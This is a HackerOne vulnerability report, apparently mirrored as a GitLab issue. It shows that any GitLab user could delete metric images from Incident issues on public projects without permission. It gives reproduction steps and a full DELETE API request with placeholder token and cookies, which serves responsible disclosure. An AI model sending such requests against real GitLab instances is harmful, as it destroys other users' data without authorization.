Any gitlab user can Delete all metrics images from incidents without permissions
HackerOne report #1107281 by ashish_r_padelkar
on 2021-02-19, assigned to @ngeorge1:
Report
Summary
Hello,
It is possible to delete all metrics images from incidents for non members of the public projects without any permissions. When you browse to any incident metrics images , you wont see delete option for metrics images. However, It is possible for any guest user to delete these metric images using this vulnerability!
Pre-requisites.
Metrics images are only available on issue of Incident
types. You need to create issue with type as Incident
Steps to reproduce
-
Login as guest user and go to any public project Incident metrics image. For eg,
https://gitlab.com/<NameSpace>/<ProjectName>/-/issues/<ID>
and click onMetrics
tab!. -
You wont see
Delete
option because you dont have any permission to delete this image. -
Just form a request like below.
DELETE /api/v4/projects/[REDACTED]/issues/5/metric_images/44 HTTP/1.1
Host: gitlab.com
Connection: close
Accept: application/json, text/plain, */*
X-CSRF-Token: <Replace_your_csrf_Token>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
X-Requested-With: XMLHttpRequest
Origin: https://gitlab.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://gitlab.com/gitlabadminuser/mvn-example/-/issues/2
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.9
Cookie: <Replace_Your_Cookies>
You need to supply Project ID, Issue ID and Metrics image ID in above request. In above eg, 23887195
is the project ID, 5
is the issue ID and 44
is the Metric image ID.
4.This will delete the metric image from issue although you dont have access to do so!
- This way, you can delete all the public metrics images even if you dont have any access to the project!
What is the current bug behavior?
Non members can delete all the public metrics images without permissions!
What is the expected correct behavior?
Only reporters(or developer) should be able to delete the metrics images within their own projects.
Output of checks
This bug happens on GitLab.com
Regards,
Ashish
Impact
Any gitlab user can potentially delete all the public metric images from incidents without permission
How To Reproduce
Please add reproducibility information to this section: